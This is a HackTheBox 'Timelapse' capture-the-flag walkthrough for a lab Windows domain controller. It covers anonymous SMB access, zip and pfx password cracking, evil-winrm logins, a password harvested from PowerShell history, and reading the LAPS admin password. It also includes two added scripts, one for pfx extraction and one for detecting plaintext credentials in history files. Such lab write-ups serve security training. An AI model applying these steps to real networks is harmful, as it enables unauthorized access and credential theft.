HackTheBox - Timelapse Walkthrough
Introduction
OS: Windows
Difficulty: Easy
Points: 20
Release: 26 Mar 2022
IP: 10.10.11.152
Timelapse is an easy Windows machine from HackTheBox. Getting the user flag takes some basic SMB enumeration, cracking a password-protected zip and the pfx file inside it, and extracting the certificate and key from that pfx to authenticate over WinRM.
Enumeration
Nmap scan result:
# Nmap 7.92 scan initiated Sun Mar 27 07:29:04 2022 as: nmap -sC -sV -vvv -oN scan.nmap 10.10.11.152
Nmap scan report for 10.10.11.152
Host is up, received echo-reply ttl 127 (0.100s latency).
Scanned at 2022-03-27 07:29:05 UTC for 67s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-03-27 15:29:18Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl? syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl? syn-ack ttl 127
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 20407/tcp): CLEAN (Timeout)
| Check 2 (port 32357/tcp): CLEAN (Timeout)
| Check 3 (port 44242/udp): CLEAN (Timeout)
| Check 4 (port 22941/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 7h59m58s
| smb2-time:
| date: 2022-03-27T15:29:29
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 27 07:30:12 2022 -- 1 IP address (1 host up) scanned in 68.08 seconds
Foothold
I tried a basic attack on SMB, a null session (anonymous guest login), and it worked: I had access to the shares. The Shares share contains two directories, Dev and HelpDesk.
#smbclient -L //10.10.11.152/
Enter WORKGROUP\GUEST's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Then I downloaded all the files from the SMB share.
#smbclient //10.10.11.152/shares
Enter WORKGROUP\GUEST's password:
Try "help" to get a list of possible commands.
smb: \> ls Dev/
. D 0 Mon Oct 25 19:40:06 2021
.. D 0 Mon Oct 25 19:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 15:46:42 2021
6367231 blocks of size 4096. 1537388 blocks available
smb: \> ls HelpDesk\
. D 0 Mon Oct 25 15:48:42 2021
.. D 0 Mon Oct 25 15:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 14:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 14:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 14:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 14:57:44 2021
6367231 blocks of size 4096. 1537388 blocks available
I read all the documents.
After that I tried to decompress the winrm_backup.zip file, but it is password-protected.
#unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
skipping: legacyy_dev_auth.pfx incorrect password
Then crack the zip password:
#fcrackzip -D -p ../rockyou.txt -u winrm_backup.zip
found file 'legacyy_dev_auth.pfx', (size cp/uc 2405/ 2555, flags 9, chk 72aa)
PASSWORD FOUND!!!!: pw == supremelegacy
User Flag
The zip file's name, winrm_backup.zip, suggests the pfx inside is meant for authenticating to WinRM. A quick Google search on what can be done with a pfx file turned up this guide on extracting the certificate and key: https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file
#openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out login.key
Enter Import Password:
Can't read Password
The pfx is protected by its own password, so we need to crack the certificate password too.
I used crackpkcs12 with the same wordlist:
#crackpkcs12 -d ../rockyou.txt legacyy_dev_auth.pfx
Dictionary attack - Starting 4 threads
*********************************************************
Dictionary attack - Thread 3 - Password found: thuglegacy
*********************************************************
Extract the private key and the certificate (public key):
#openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out login.key
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
#openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
Enter Import Password:
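Added example, not part of the original walkthrough: the same two openssl extractions done non-interactively, followed by a check that the extracted key and certificate actually belong together before they are handed to evil-winrm. It builds its own throwaway pfx with a constructed password so it runs offline; the file names and password are assumptions.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): extract the key and
# certificate from a PFX non-interactively, then verify that the two belong
# together before trying to use them for WinRM. Requires the openssl CLI.
set -eu

WORK="$(mktemp -d)"
# Constructed input: a throwaway self-signed client cert bundled into a PFX
# protected with a made-up password, standing in for legacyy_dev_auth.pfx.
PFX_PASS="constructed-pw"
openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj "/CN=legacyy-example" \
  -keyout "$WORK/orig.key" -out "$WORK/orig.crt" 2>/dev/null
openssl pkcs12 -export -inkey "$WORK/orig.key" -in "$WORK/orig.crt" \
  -passout "pass:$PFX_PASS" -out "$WORK/sample.pfx"

# extract_pfx PFX PASSWORD OUTDIR: the two openssl commands from the
# walkthrough, with the import password passed on the command line and the
# private key written unencrypted (-nodes) so nothing prompts.
extract_pfx() {
  openssl pkcs12 -in "$1" -passin "pass:$2" -nocerts -nodes -out "$3/login.key"
  openssl pkcs12 -in "$1" -passin "pass:$2" -clcerts -nokeys -out "$3/cert.crt"
}

# pubkey_fp FILE KIND: SHA-256 of the public key in PEM form, where KIND is
# "key" (private key file) or "cert" (certificate file).
pubkey_fp() {
  if [ "$2" = key ]; then
    openssl pkey -in "$1" -pubout 2>/dev/null
  else
    openssl x509 -in "$1" -pubkey -noout 2>/dev/null
  fi | openssl dgst -sha256 | awk '{print $NF}'
}

# key_matches_cert KEY CERT: prints "match" when the private key's public
# half equals the certificate's public key, "mismatch" otherwise.
key_matches_cert() {
  if [ "$(pubkey_fp "$1" key)" = "$(pubkey_fp "$2" cert)" ]; then
    echo match
  else
    echo mismatch
  fi
}

extract_pfx "$WORK/sample.pfx" "$PFX_PASS" "$WORK"
key_matches_cert "$WORK/login.key" "$WORK/cert.crt"
# Subject and validity are worth a look before connecting: an expired or
# wrong-subject cert is the usual reason a WinRM certificate logon fails.
openssl x509 -in "$WORK/cert.crt" -noout -subject -enddate
```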
Login with evil-winrm using the certificate and key:
#evil-winrm -S -k login.key -c cert.crt -i 10.10.11.152
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents>
Get the user flag:
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..
*Evil-WinRM* PS C:\Users\legacyy> tree /f
Folder PATH listing
Volume serial number is 22CC-AE66
C:.
├───Desktop
│       user.txt
│
├───Documents
├───Downloads
├───Favorites
├───Links
├───Music
├───Pictures
├───Saved Games
└───Videos
*Evil-WinRM* PS C:\Users\legacyy> cat Desktop/user.txt
56146e0ef****************
Priv Esc
The user svc_deploy is a member of the LAPS_Readers group:
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
*Evil-WinRM* PS C:\Users> net user svc_deploy
Enter PEM pass phrase:
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/25/2021 12:25:53 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
Then I looked at the PowerShell history file (ConsoleHost_history.txt) and found the svc_deploy password in plaintext:
*Evil-WinRM* PS C:\Users> cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'REDACTED' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
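From the defender's side, as an added example that is not part of the original walkthrough: a small POSIX sh scanner that flags plaintext credentials in PSReadLine history files like the one above. The sample history file, its account names and its secrets are constructed.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): flag plaintext
# credentials left in PSReadLine history files, the weakness that exposed
# svc_deploy above. Pure POSIX sh + grep; constructed sample input inline.
set -eu

# Constructed history file modelled on the one found under
# $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
HIST="$(mktemp)"
cat > "$HIST" <<'EOF'
whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'example-secret' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
$p2 = Read-Host -AsSecureString
net use \\fileserver\share /user:corp\svc_backup 'example-secret-2'
get-aduser -filter * -properties *
EOF

# find_plaintext_creds FILE: print "lineno:text" for lines that embed a
# secret in the command itself. Heuristic patterns: a quoted literal (not a
# $variable) passed to ConvertTo-SecureString -AsPlainText, and net use /
# runas style "/user:... <password>" arguments. Read-Host -AsSecureString is
# the safe form and is deliberately not matched.
find_plaintext_creds() {
  grep -n -i -E \
    -e "ConvertTo-SecureString[[:space:]]+['\"][^'\"\$]+['\"].*-AsPlainText" \
    -e "/user:[^[:space:]]+[[:space:]]+['\"]?[^[:space:]'\"]+" \
    "$1" || true
}

# count_plaintext_creds FILE: number of flagged lines, handy for a
# fleet-wide sweep where only a per-host count is reported.
count_plaintext_creds() {
  find_plaintext_creds "$1" | wc -l | tr -d ' '
}

find_plaintext_creds "$HIST"
```

On the PowerShell side, Set-PSReadLineOption -HistorySaveStyle SaveNothing stops the history file being written at all for accounts that handle credentials interactively.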
I logged in as svc_deploy:
#evil-winrm -S -u "svc_deploy" -p 'REDACTED' -i 10.10.11.152
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
Root flag
The LAPS documentation says you can view the local administrator password with a PowerShell command.
Let's import the PowerShell module AdmPwd.PS; I cloned it from the repository below and uploaded it with evil-winrm:
git clone https://github.com/ztrhgf/LAPS.git
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> upload /root/ctf/htb/timelapse/LAPS/AdmPwd.PS
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Uploading /root/ctf/htb/timelapse/LAPS/AdmPwd.PS to C:\Users\svc_deploy\Documents\AdmPwd.PS
Data: 53980 bytes of 53980 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Import-module ./AdmPwd.PS
Following the document, we need the computer name to get the password. The document says:
You can also get the password using PowerShell.
Get-AdmPwdPassword -ComputerName
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> $env:computername
DC01
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-AdmPwdPassword -ComputerName DC01 | Format-table -autosize
ComputerName DistinguishedName Password ExpirationTimestamp
------------ ----------------- -------- -------------------
DC01 CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb REDACTED 4/6/2022 9:46:40 AM
Login as administrator:
#evil-winrm -S -u "administrator" -p 'REDACTED' -i 10.10.11.152
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Finding the root flag:
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd /users
*Evil-WinRM* PS C:\users> tree /f
Folder PATH listing
Volume serial number is 22CC-AE66
├───TRX
│   ├───3D Objects
│   ├───Contacts
│   ├───Desktop
│   │       root.txt
Get the root flag:
*Evil-WinRM* PS C:\users> cat TRX/Desktop/root.txt
9e605da46bc349*****************